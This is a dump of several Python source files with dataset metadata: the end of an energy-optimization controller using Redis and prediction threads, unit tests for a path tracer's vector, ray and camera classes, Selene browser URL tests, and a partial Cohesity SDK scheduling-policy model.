with open(path, "r") as file:
input_config_file = json.loads(file.read())
self.logger.debug("Input.registry.file found")
except Exception as e:
self.logger.error("Input file not found")
input_config_file = {}
self.logger.error(e)
try:
# Reads the registry/input and stores it into an object
path = os.path.join(os.getcwd(), "optimization/resources", str(self.id), "Input.registry.mqtt")
if not os.path.exists(path):
input_config_mqtt = {}
self.logger.debug("Not Input.registry.mqtt present")
else:
with open(path, "r") as file:
input_config_mqtt = json.loads(file.read())
self.logger.debug("Input.registry.mqtt found")
except Exception as e:
self.logger.error("Input file not found")
input_config_mqtt = {}
self.logger.error(e)
persist_base_path = config.get("IO", "persist.base.file.path")
persist_base_path = os.path.join(os.getcwd(), persist_base_path, str(self.id), Constants.persisted_folder_name)
input_config_parser = InputConfigParser(input_config_file, input_config_mqtt, self.model_name, self.id,
self.optimization_type, persist_base_path, self.restart)
missing_keys = input_config_parser.check_keys_for_completeness()
if len(missing_keys) > 0:
raise MissingKeysException("Data source for following keys not declared: " + str(missing_keys))
opt_values = input_config_parser.get_optimization_values()
self.redisDB.set(self.id+":opt_values", json.dumps(opt_values))
self.prediction_threads = {}
self.prediction_names = input_config_parser.get_prediction_names()
if self.prediction_names is not None and len(self.prediction_names) > 0:
for prediction_name in self.prediction_names:
flag = input_config_parser.get_forecast_flag(prediction_name)
if flag:
self.logger.info("Creating prediction controller thread for topic " + str(prediction_name))
topic_param = input_config_parser.get_params(prediction_name)
parameters = json.dumps(
{"control_frequency": self.control_frequency, "horizon_in_steps": self.horizon_in_steps,
"topic_param": topic_param, "dT_in_seconds": self.dT_in_seconds, "type": "load"})
self.redisDB.set("train:" + self.id + ":" + prediction_name, parameters)
opt_values = input_config_parser.get_optimization_values()
self.prediction_threads[prediction_name] = Prediction(config, self.control_frequency,
self.horizon_in_steps, prediction_name,
topic_param, self.dT_in_seconds, self.id,
output_config, "load", opt_values)
self.prediction_threads[prediction_name].start()
self.pv_lstm_names = input_config_parser.get_pv_lstm_names()
if self.pv_lstm_names is not None and len(self.pv_lstm_names) > 0:
for pv_lstm_name in self.pv_lstm_names:
flag = input_config_parser.get_forecast_flag(pv_lstm_name)
if flag:
self.logger.info("Creating pv lstm controller thread for topic " + str(pv_lstm_name))
topic_param = input_config_parser.get_params(pv_lstm_name)
parameters = json.dumps(
{"control_frequency": self.control_frequency, "horizon_in_steps": self.horizon_in_steps,
"topic_param": topic_param, "dT_in_seconds": self.dT_in_seconds, "type": "pv"})
self.redisDB.set("train:" + self.id + ":" + pv_lstm_name, parameters)
opt_values = input_config_parser.get_optimization_values()
self.prediction_threads[pv_lstm_name] = Prediction(config, self.control_frequency,
self.horizon_in_steps, pv_lstm_name,
topic_param, self.dT_in_seconds, self.id,
output_config, "pv", opt_values)
self.prediction_threads[pv_lstm_name].start()
self.non_prediction_threads = {}
self.non_prediction_names = input_config_parser.get_pv_prediction_names()
if self.non_prediction_names is not None and len(self.non_prediction_names) > 0:
for non_prediction_name in self.non_prediction_names:
flag = input_config_parser.get_forecast_flag(non_prediction_name)
if flag:
self.non_prediction_threads[non_prediction_name] = PVPrediction(config, output_config,
input_config_parser,
self.id,
self.control_frequency,
self.horizon_in_steps,
self.dT_in_seconds,
non_prediction_name)
self.non_prediction_threads[non_prediction_name].start()
# Initializing constructor of the optimization controller thread
if self.optimization_type == "MPC":
self.opt = OptControllerMPC(self.id, self.solver_name, self.model_path, self.control_frequency,
self.repetition, output_config, input_config_parser, config,
self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type)
elif self.optimization_type == "discrete":
self.opt = OptControllerDiscrete(self.id, self.solver_name, self.model_path, self.control_frequency,
self.repetition, output_config, input_config_parser, config,
self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type)
elif self.optimization_type == "stochastic":
self.opt = OptControllerStochastic(self.id, self.solver_name, self.model_path,
self.control_frequency, self.repetition, output_config,
input_config_parser, config, self.horizon_in_steps,
self.dT_in_seconds, self.optimization_type, self.single_ev)
try:
####starts the optimization controller thread
self.logger.debug("Mqtt issue " + str(self.redisDB.get("Error mqtt" + self.id)))
if "False" in self.redisDB.get("Error mqtt" + self.id):
self.opt.start()
self.logger.debug("Optimization object started")
return 0
else:
self.redisDB.set("run:" + self.id, "stopping")
self.stopOptControllerThread()
self.redisDB.set("run:" + self.id, "stopped")
self.logger.error("Optimization object could not be started")
return 2
except Exception as e:
self.logger.error(e)
return 1
def stopOptControllerThread(self):
try:
# stop as per ID
for name, obj in self.prediction_threads.items():
self.redisDB.remove("train:" + self.id + ":" + name)
obj.Stop()
for name, obj in self.non_prediction_threads.items():
obj.Stop()
self.logger.info("Stopping optimization controller thread")
self.opt.Stop()
self.logger.info("Optimization controller thread stopped")
return "Optimization controller thread stopped"
except Exception as e:
self.logger.error(e)
return e
def is_running(self):
return not self.opt.get_finish_status()
def update_training_params(self, key, parameters):
while True:
self.redisDB.set(key, parameters)
time.sleep("60") | en | 0.527412 | #from optimization.controllerStochasticTestPebble import OptControllerStochastic #restart = True # print(os.path.sep) # print(os.environ.get("HOME")) #self.logger.debug("Error mqtt " + str(self.redisDB.get("Error mqtt" + self.id))) # Creating an object of the configuration file (standard values) # Loads the solver name if it was not given thorough the endpoint command/start/id # Loads the solver name if not specified in command/start/id ############################################################################################## # Reads the registry/output and stores it into an object # Reads the registry/input and stores it into an object # Reads the registry/input and stores it into an object # Initializing constructor of the optimization controller thread ####starts the optimization controller thread # stop as per ID | 1.931506 | 2 |
ptrace/oop/math_tests.py | xann16/py-path-tracing | 0 | 9142 | <filename>ptrace/oop/math_tests.py<gh_stars>0
"""Unit tests for math-oriented common classes."""
import unittest
import math
import numpy as np
from .vector import Vec3, OrthonormalBasis
from .raycast_base import Ray
from .camera import Camera
class Vec3Tests(unittest.TestCase):
"""Test for Vec3 class."""
def test_vec3_basic(self):
"""Basic creation, access and manipulation of vector components."""
zero = Vec3()
vvv = Vec3(1, 2, 3)
x_arr = np.array([.1, .2, .3], dtype='double')
xxx = Vec3.from_array(x_arr)
ones = Vec3.full(1.0)
i_hat = Vec3.versor(0)
self.assertEqual(zero[0], 0.0)
self.assertEqual(zero[1], 0.0)
self.assertEqual(zero[2], 0.0)
self.assertEqual(vvv[0], 1.0)
self.assertEqual(vvv[1], 2.0)
self.assertEqual(vvv[2], 3.0)
vvv[2] = 10
self.assertEqual(vvv[2], 10.0)
self.assertEqual(str(vvv), '[ 1. 2. 10.]')
self.assertEqual(xxx[0], .1)
self.assertEqual(xxx[1], .2)
self.assertEqual(xxx[2], .3)
self.assertEqual(ones[0], 1)
self.assertEqual(ones[1], 1)
self.assertEqual(ones[2], 1)
self.assertEqual(i_hat[0], 1)
self.assertEqual(i_hat[1], 0)
self.assertEqual(i_hat[2], 0)
is_v_eq = np.allclose(vvv.data(), np.array([1, 2, 10]))
self.assertEqual(is_v_eq, True)
is_x_eq = np.allclose(xxx.data(), x_arr)
self.assertEqual(is_x_eq, True)
self.assertEqual(vvv.copy(), vvv)
def test_vec3_arithmetic_and_comparisons(self):
"""Testing methods and operators used for arithmentic and comparisons.
"""
xxx = Vec3(1, 2, 3)
yyy = Vec3(1, 2, 3)
zzz = Vec3(1, 0, -1)
self.assertEqual(xxx == yyy, True)
self.assertEqual(xxx != yyy, False)
self.assertEqual(xxx != zzz, True)
self.assertEqual(xxx == zzz, False)
self.assertEqual(yyy != zzz, True)
self.assertEqual(yyy == zzz, False)
yyy += zzz
self.assertEqual(yyy, Vec3.full(2))
self.assertEqual(yyy + xxx, Vec3(3, 4, 5))
yyy -= zzz
self.assertEqual(yyy, xxx)
self.assertEqual(yyy - xxx, Vec3())
self.assertEqual(+xxx, xxx)
self.assertEqual(-xxx, Vec3(-1, -2, -3))
yyy *= -1
self.assertEqual(yyy, -xxx)
self.assertEqual(yyy * -1.0, xxx)
zzz /= 2
self.assertEqual(zzz, Vec3(.5, 0, -.5))
self.assertEqual(zzz / 2, Vec3(.25, 0, -.25))
vvv = Vec3(3, 1, -2)
vvv *= Vec3(2, .5, -1)
self.assertEqual(vvv, Vec3(6, .5, 2))
self.assertEqual(vvv * Vec3.full(2), Vec3(12, 1, 4))
www = Vec3.full(10)
www /= Vec3(10, 5, 2)
self.assertEqual(www, Vec3(1, 2, 5))
self.assertEqual(www / 2, Vec3(.5, 1, 2.5))
self.assertAlmostEqual(www.dot(Vec3()), 0)
self.assertAlmostEqual(Vec3(1, 2, 4).dot(Vec3(1, -2, 1)), 1)
self.assertEqual(Vec3.versor(0).cross(Vec3.versor(1)), Vec3.versor(2))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(2)), Vec3.versor(0))
self.assertEqual(Vec3.versor(2).cross(Vec3.versor(0)), Vec3.versor(1))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(0)), -Vec3.versor(2))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(1)), Vec3())
self.assertEqual(Vec3(1, 2, 3).isclose(Vec3(1, 2, 3)), True)
self.assertEqual(Vec3(1, 2, 3).isclose(Vec3(1, 2.0001, 3), 0.1), True)
def test_vec3_normalization(self):
"""Testing length calculations and normalisation."""
self.assertAlmostEqual(Vec3().sqr_length(), 0.0)
self.assertAlmostEqual(Vec3().length(), 0.0)
self.assertAlmostEqual(Vec3.versor(0).sqr_length(), 1.0)
self.assertAlmostEqual(Vec3.versor(1).length(), 1.0)
self.assertAlmostEqual(abs(Vec3.versor(2)), 1.0)
self.assertEqual(Vec3.versor(0).normalised(), Vec3.versor(0))
self.assertEqual(Vec3.versor(1).normalised(), Vec3.versor(1))
self.assertEqual(Vec3.versor(2).normalised(), Vec3.versor(2))
sqrt3 = math.sqrt(3)
v_sqrt3_inv = Vec3.full(1. / sqrt3)
self.assertAlmostEqual(Vec3.full(1).sqr_length(), 3)
self.assertAlmostEqual(Vec3.full(1).length(), sqrt3)
self.assertEqual(Vec3.full(1).normalised(), v_sqrt3_inv)
def test_vec3_reflection(self):
"""Testing reflection with respect to given normal vector."""
nnn = Vec3.versor(2)
self.assertEqual(nnn.reflect(Vec3.versor(0)), Vec3.versor(0))
self.assertEqual(nnn.reflect(Vec3.versor(2)), -Vec3.versor(2))
diag = Vec3(1, 1, 1).normalised()
diag_refl = diag.copy()
diag_refl[2] = -diag_refl[2]
self.assertEqual(nnn.reflect(diag), diag_refl)
class OrthonormalBasisTests(unittest.TestCase):
"""Tests for OrthonormalBasis class."""
def test_onb_basic(self):
"""Basic test reconstructing natural ONB."""
nat = OrthonormalBasis(Vec3.versor(0), Vec3.versor(1), Vec3.versor(2))
nat_alt = OrthonormalBasis.from_two('xy', Vec3.versor(0), Vec3.versor(1))
vvv = Vec3(1, 2, 3)
self.assertEqual(nat.transform(vvv), vvv)
self.assertEqual(nat_alt.transform(vvv), vvv)
def test_onb_factories(self):
"""Testing factory methods for creating ONBs from one or two vectors."""
onb1 = OrthonormalBasis.from_two('xy', Vec3(1, 2, 4).normalised(),\
Vec3(0, 0, -7).normalised())
self.assertAlmostEqual(abs(onb1.x_axis), 1.0)
self.assertAlmostEqual(abs(onb1.y_axis), 1.0)
self.assertAlmostEqual(abs(onb1.z_axis), 1.0)
self.assertAlmostEqual(onb1.x_axis.dot(onb1.y_axis), 0.0)
self.assertAlmostEqual(onb1.x_axis.dot(onb1.z_axis), 0.0)
self.assertAlmostEqual(onb1.y_axis.dot(onb1.z_axis), 0.0)
onb2 = OrthonormalBasis.from_two('zx', Vec3(-1, -1, -1).normalised(),\
Vec3(1, 1, -1).normalised())
self.assertAlmostEqual(abs(onb2.x_axis), 1.0)
self.assertAlmostEqual(abs(onb2.y_axis), 1.0)
self.assertAlmostEqual(abs(onb2.z_axis), 1.0)
self.assertAlmostEqual(onb2.x_axis.dot(onb2.y_axis), 0.0)
self.assertAlmostEqual(onb2.x_axis.dot(onb2.z_axis), 0.0)
self.assertAlmostEqual(onb2.y_axis.dot(onb2.z_axis), 0.0)
onb3 = OrthonormalBasis.from_z_axis(Vec3.versor(0))
self.assertAlmostEqual(abs(onb3.x_axis), 1.0)
self.assertAlmostEqual(abs(onb3.y_axis), 1.0)
self.assertAlmostEqual(abs(onb3.z_axis), 1.0)
self.assertAlmostEqual(onb3.x_axis.dot(onb3.y_axis), 0.0)
self.assertAlmostEqual(onb3.x_axis.dot(onb3.z_axis), 0.0)
self.assertAlmostEqual(onb3.y_axis.dot(onb3.z_axis), 0.0)
class RayTests(unittest.TestCase):
"""Tests for Ray class."""
def test_ray_basic(self):
"""Basic tests chcecking ray creation and probing their points."""
ox_axis = Ray(Vec3(), Vec3.versor(0))
self.assertEqual(ox_axis.point_at(4), Vec3(4, 0, 0))
direction = Vec3(1, -1, 0).normalised()
ray1 = Ray(Vec3(0, 2, 0), direction)
ray2 = Ray.from_points(Vec3(0, 2, 0), Vec3(2, 0, 0))
self.assertEqual(ray1.direction, direction)
self.assertEqual(ray2.direction, direction)
for i in range(10):
self.assertEqual(ray1.point_at(i), ray2.point_at(i))
self.assertEqual(ray1.point_at(0), ray1.origin)
self.assertEqual(ray2.point_at(0), ray2.origin)
class CameraTests(unittest.TestCase):
"""Tests for Camera class."""
def test_cam_basic(self):
"""Basic test checking if camera casts rays in correct direction."""
cam = Camera(Vec3(), Vec3.versor(0), Vec3.versor(2), 10, 10, 120)
cam.set_focus(Vec3.versor(0), 1.0)
for px_x in range(10):
for px_y in range(10):
ray = cam.get_ray(px_x, px_y)
self.assertGreaterEqual(ray.direction.dot(Vec3.versor(0)), 0.0)
if __name__ == '__main__':
unittest.main()
| <filename>ptrace/oop/math_tests.py<gh_stars>0
"""Unit tests for math-oriented common classes."""
import unittest
import math
import numpy as np
from .vector import Vec3, OrthonormalBasis
from .raycast_base import Ray
from .camera import Camera
class Vec3Tests(unittest.TestCase):
"""Test for Vec3 class."""
def test_vec3_basic(self):
"""Basic creation, access and manipulation of vector components."""
zero = Vec3()
vvv = Vec3(1, 2, 3)
x_arr = np.array([.1, .2, .3], dtype='double')
xxx = Vec3.from_array(x_arr)
ones = Vec3.full(1.0)
i_hat = Vec3.versor(0)
self.assertEqual(zero[0], 0.0)
self.assertEqual(zero[1], 0.0)
self.assertEqual(zero[2], 0.0)
self.assertEqual(vvv[0], 1.0)
self.assertEqual(vvv[1], 2.0)
self.assertEqual(vvv[2], 3.0)
vvv[2] = 10
self.assertEqual(vvv[2], 10.0)
self.assertEqual(str(vvv), '[ 1. 2. 10.]')
self.assertEqual(xxx[0], .1)
self.assertEqual(xxx[1], .2)
self.assertEqual(xxx[2], .3)
self.assertEqual(ones[0], 1)
self.assertEqual(ones[1], 1)
self.assertEqual(ones[2], 1)
self.assertEqual(i_hat[0], 1)
self.assertEqual(i_hat[1], 0)
self.assertEqual(i_hat[2], 0)
is_v_eq = np.allclose(vvv.data(), np.array([1, 2, 10]))
self.assertEqual(is_v_eq, True)
is_x_eq = np.allclose(xxx.data(), x_arr)
self.assertEqual(is_x_eq, True)
self.assertEqual(vvv.copy(), vvv)
def test_vec3_arithmetic_and_comparisons(self):
"""Testing methods and operators used for arithmentic and comparisons.
"""
xxx = Vec3(1, 2, 3)
yyy = Vec3(1, 2, 3)
zzz = Vec3(1, 0, -1)
self.assertEqual(xxx == yyy, True)
self.assertEqual(xxx != yyy, False)
self.assertEqual(xxx != zzz, True)
self.assertEqual(xxx == zzz, False)
self.assertEqual(yyy != zzz, True)
self.assertEqual(yyy == zzz, False)
yyy += zzz
self.assertEqual(yyy, Vec3.full(2))
self.assertEqual(yyy + xxx, Vec3(3, 4, 5))
yyy -= zzz
self.assertEqual(yyy, xxx)
self.assertEqual(yyy - xxx, Vec3())
self.assertEqual(+xxx, xxx)
self.assertEqual(-xxx, Vec3(-1, -2, -3))
yyy *= -1
self.assertEqual(yyy, -xxx)
self.assertEqual(yyy * -1.0, xxx)
zzz /= 2
self.assertEqual(zzz, Vec3(.5, 0, -.5))
self.assertEqual(zzz / 2, Vec3(.25, 0, -.25))
vvv = Vec3(3, 1, -2)
vvv *= Vec3(2, .5, -1)
self.assertEqual(vvv, Vec3(6, .5, 2))
self.assertEqual(vvv * Vec3.full(2), Vec3(12, 1, 4))
www = Vec3.full(10)
www /= Vec3(10, 5, 2)
self.assertEqual(www, Vec3(1, 2, 5))
self.assertEqual(www / 2, Vec3(.5, 1, 2.5))
self.assertAlmostEqual(www.dot(Vec3()), 0)
self.assertAlmostEqual(Vec3(1, 2, 4).dot(Vec3(1, -2, 1)), 1)
self.assertEqual(Vec3.versor(0).cross(Vec3.versor(1)), Vec3.versor(2))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(2)), Vec3.versor(0))
self.assertEqual(Vec3.versor(2).cross(Vec3.versor(0)), Vec3.versor(1))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(0)), -Vec3.versor(2))
self.assertEqual(Vec3.versor(1).cross(Vec3.versor(1)), Vec3())
self.assertEqual(Vec3(1, 2, 3).isclose(Vec3(1, 2, 3)), True)
self.assertEqual(Vec3(1, 2, 3).isclose(Vec3(1, 2.0001, 3), 0.1), True)
def test_vec3_normalization(self):
"""Testing length calculations and normalisation."""
self.assertAlmostEqual(Vec3().sqr_length(), 0.0)
self.assertAlmostEqual(Vec3().length(), 0.0)
self.assertAlmostEqual(Vec3.versor(0).sqr_length(), 1.0)
self.assertAlmostEqual(Vec3.versor(1).length(), 1.0)
self.assertAlmostEqual(abs(Vec3.versor(2)), 1.0)
self.assertEqual(Vec3.versor(0).normalised(), Vec3.versor(0))
self.assertEqual(Vec3.versor(1).normalised(), Vec3.versor(1))
self.assertEqual(Vec3.versor(2).normalised(), Vec3.versor(2))
sqrt3 = math.sqrt(3)
v_sqrt3_inv = Vec3.full(1. / sqrt3)
self.assertAlmostEqual(Vec3.full(1).sqr_length(), 3)
self.assertAlmostEqual(Vec3.full(1).length(), sqrt3)
self.assertEqual(Vec3.full(1).normalised(), v_sqrt3_inv)
def test_vec3_reflection(self):
"""Testing reflection with respect to given normal vector."""
nnn = Vec3.versor(2)
self.assertEqual(nnn.reflect(Vec3.versor(0)), Vec3.versor(0))
self.assertEqual(nnn.reflect(Vec3.versor(2)), -Vec3.versor(2))
diag = Vec3(1, 1, 1).normalised()
diag_refl = diag.copy()
diag_refl[2] = -diag_refl[2]
self.assertEqual(nnn.reflect(diag), diag_refl)
class OrthonormalBasisTests(unittest.TestCase):
"""Tests for OrthonormalBasis class."""
def test_onb_basic(self):
"""Basic test reconstructing natural ONB."""
nat = OrthonormalBasis(Vec3.versor(0), Vec3.versor(1), Vec3.versor(2))
nat_alt = OrthonormalBasis.from_two('xy', Vec3.versor(0), Vec3.versor(1))
vvv = Vec3(1, 2, 3)
self.assertEqual(nat.transform(vvv), vvv)
self.assertEqual(nat_alt.transform(vvv), vvv)
def test_onb_factories(self):
"""Testing factory methods for creating ONBs from one or two vectors."""
onb1 = OrthonormalBasis.from_two('xy', Vec3(1, 2, 4).normalised(),\
Vec3(0, 0, -7).normalised())
self.assertAlmostEqual(abs(onb1.x_axis), 1.0)
self.assertAlmostEqual(abs(onb1.y_axis), 1.0)
self.assertAlmostEqual(abs(onb1.z_axis), 1.0)
self.assertAlmostEqual(onb1.x_axis.dot(onb1.y_axis), 0.0)
self.assertAlmostEqual(onb1.x_axis.dot(onb1.z_axis), 0.0)
self.assertAlmostEqual(onb1.y_axis.dot(onb1.z_axis), 0.0)
onb2 = OrthonormalBasis.from_two('zx', Vec3(-1, -1, -1).normalised(),\
Vec3(1, 1, -1).normalised())
self.assertAlmostEqual(abs(onb2.x_axis), 1.0)
self.assertAlmostEqual(abs(onb2.y_axis), 1.0)
self.assertAlmostEqual(abs(onb2.z_axis), 1.0)
self.assertAlmostEqual(onb2.x_axis.dot(onb2.y_axis), 0.0)
self.assertAlmostEqual(onb2.x_axis.dot(onb2.z_axis), 0.0)
self.assertAlmostEqual(onb2.y_axis.dot(onb2.z_axis), 0.0)
onb3 = OrthonormalBasis.from_z_axis(Vec3.versor(0))
self.assertAlmostEqual(abs(onb3.x_axis), 1.0)
self.assertAlmostEqual(abs(onb3.y_axis), 1.0)
self.assertAlmostEqual(abs(onb3.z_axis), 1.0)
self.assertAlmostEqual(onb3.x_axis.dot(onb3.y_axis), 0.0)
self.assertAlmostEqual(onb3.x_axis.dot(onb3.z_axis), 0.0)
self.assertAlmostEqual(onb3.y_axis.dot(onb3.z_axis), 0.0)
class RayTests(unittest.TestCase):
"""Tests for Ray class."""
def test_ray_basic(self):
"""Basic tests chcecking ray creation and probing their points."""
ox_axis = Ray(Vec3(), Vec3.versor(0))
self.assertEqual(ox_axis.point_at(4), Vec3(4, 0, 0))
direction = Vec3(1, -1, 0).normalised()
ray1 = Ray(Vec3(0, 2, 0), direction)
ray2 = Ray.from_points(Vec3(0, 2, 0), Vec3(2, 0, 0))
self.assertEqual(ray1.direction, direction)
self.assertEqual(ray2.direction, direction)
for i in range(10):
self.assertEqual(ray1.point_at(i), ray2.point_at(i))
self.assertEqual(ray1.point_at(0), ray1.origin)
self.assertEqual(ray2.point_at(0), ray2.origin)
class CameraTests(unittest.TestCase):
"""Tests for Camera class."""
def test_cam_basic(self):
"""Basic test checking if camera casts rays in correct direction."""
cam = Camera(Vec3(), Vec3.versor(0), Vec3.versor(2), 10, 10, 120)
cam.set_focus(Vec3.versor(0), 1.0)
for px_x in range(10):
for px_y in range(10):
ray = cam.get_ray(px_x, px_y)
self.assertGreaterEqual(ray.direction.dot(Vec3.versor(0)), 0.0)
if __name__ == '__main__':
unittest.main()
| en | 0.823816 | Unit tests for math-oriented common classes. Test for Vec3 class. Basic creation, access and manipulation of vector components. Testing methods and operators used for arithmentic and comparisons. Testing length calculations and normalisation. Testing reflection with respect to given normal vector. Tests for OrthonormalBasis class. Basic test reconstructing natural ONB. Testing factory methods for creating ONBs from one or two vectors. Tests for Ray class. Basic tests chcecking ray creation and probing their points. Tests for Camera class. Basic test checking if camera casts rays in correct direction. | 2.447699 | 2 |
tests/integration/condition__browser__have_url_test.py | kianku/selene | 0 | 9143 | # MIT License
#
# Copyright (c) 2015-2020 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import pytest
from selene import have
from selene.core.exceptions import TimeoutException
start_page = 'file://' + os.path.abspath(os.path.dirname(__file__)) + '/../resources/start_page.html'
def test_have_url(session_browser):
session_browser.open(start_page)
session_browser.should(have.url(session_browser.driver.current_url))
session_browser.should(have.no.url(session_browser.driver.current_url[:-1]))
def test_have_url_containing(session_browser):
session_browser.open(start_page)
session_browser.should(have.url_containing('start_page.html'))
session_browser.should(have.no.url_containing('start_page.xhtml'))
def test_fails_on_timeout_during_waiting_for_exact_url(session_browser):
browser = session_browser.with_(timeout=0.1)
browser.open(start_page)
with pytest.raises(TimeoutException):
browser.should(have.url('xttp:/'))
# TODO: check message too
def test_fails_on_timeout_during_waiting_for_part_of_url(session_browser):
browser = session_browser.with_(timeout=0.1)
browser.open(start_page)
with pytest.raises(TimeoutException):
browser.should(have.url_containing('xttp:/'))
# TODO: check message too
| # MIT License
#
# Copyright (c) 2015-2020 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import pytest
from selene import have
from selene.core.exceptions import TimeoutException
start_page = 'file://' + os.path.abspath(os.path.dirname(__file__)) + '/../resources/start_page.html'
def test_have_url(session_browser):
session_browser.open(start_page)
session_browser.should(have.url(session_browser.driver.current_url))
session_browser.should(have.no.url(session_browser.driver.current_url[:-1]))
def test_have_url_containing(session_browser):
session_browser.open(start_page)
session_browser.should(have.url_containing('start_page.html'))
session_browser.should(have.no.url_containing('start_page.xhtml'))
def test_fails_on_timeout_during_waiting_for_exact_url(session_browser):
browser = session_browser.with_(timeout=0.1)
browser.open(start_page)
with pytest.raises(TimeoutException):
browser.should(have.url('xttp:/'))
# TODO: check message too
def test_fails_on_timeout_during_waiting_for_part_of_url(session_browser):
browser = session_browser.with_(timeout=0.1)
browser.open(start_page)
with pytest.raises(TimeoutException):
browser.should(have.url_containing('xttp:/'))
# TODO: check message too
| en | 0.731234 | # MIT License # # Copyright (c) 2015-2020 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # TODO: check message too # TODO: check message too | 1.825924 | 2 |
cohesity_management_sdk/models/scheduling_policy.py | chandrashekar-cohesity/management-sdk-python | 1 | 9144 | <reponame>chandrashekar-cohesity/management-sdk-python
# -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
import cohesity_management_sdk.models.continuous_schedule
import cohesity_management_sdk.models.daily_schedule
import cohesity_management_sdk.models.monthly_schedule
import cohesity_management_sdk.models.rpo_schedule
class SchedulingPolicy(object):
"""Implementation of the 'SchedulingPolicy' model.
Specifies settings that define a backup schedule for a Protection Job.
Attributes:
continuous_schedule (ContinuousSchedule): Specifies the time interval
between two Job Runs of a continuous backup schedule and any
blackout periods when new Job Runs should NOT be started. Set if
periodicity is kContinuous.
daily_schedule (DailySchedule): Specifies a daily or weekly backup
schedule. Set if periodicity is kDaily.
monthly_schedule (MonthlySchedule): Specifies a monthly backup
schedule. Set if periodicity is kMonthly.
periodicity (PeriodicityEnum): Specifies how often to start new Job
Runs of a Protection Job. 'kDaily' means new Job Runs start daily.
'kMonthly' means new Job Runs start monthly. 'kContinuous' means
new Job Runs repetitively start at the beginning of the specified
time interval (in hours or minutes). 'kContinuousRPO' means this
is an RPO schedule.
rpo_schedule (RpoSchedule): Specifies an RPO backup schedule. Set if
periodicity is kContinuousRPO.
"""
# Create a mapping from Model property names to API property names
_names = {
"continuous_schedule":'continuousSchedule',
"daily_schedule":'dailySchedule',
"monthly_schedule":'monthlySchedule',
"periodicity":'periodicity',
"rpo_schedule":'rpoSchedule'
}
def __init__(self,
continuous_schedule=None,
daily_schedule=None,
monthly_schedule=None,
periodicity=None,
rpo_schedule=None):
"""Constructor for the SchedulingPolicy class"""
# Initialize members of the class
self.continuous_schedule = continuous_schedule
self.daily_schedule = daily_schedule
self.monthly_schedule = monthly_schedule
self.periodicity = periodicity
self.rpo_schedule = rpo_schedule
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
continuous_schedule = cohesity_management_sdk.models.continuous_schedule.ContinuousSchedule.from_dictionary(dictionary.get('continuousSchedule')) if dictionary.get('continuousSchedule') else None
daily_schedule = cohesity_management_sdk.models.daily_schedule.DailySchedule.from_dictionary(dictionary.get('dailySchedule')) if dictionary.get('dailySchedule') else None
monthly_schedule = cohesity_management_sdk.models.monthly_schedule.MonthlySchedule.from_dictionary(dictionary.get('monthlySchedule')) if dictionary.get('monthlySchedule') else None
periodicity = dictionary.get('periodicity')
rpo_schedule = cohesity_management_sdk.models.rpo_schedule.RpoSchedule.from_dictionary(dictionary.get('rpoSchedule')) if dictionary.get('rpoSchedule') else None
# Return an object of this model
return cls(continuous_schedule,
daily_schedule,
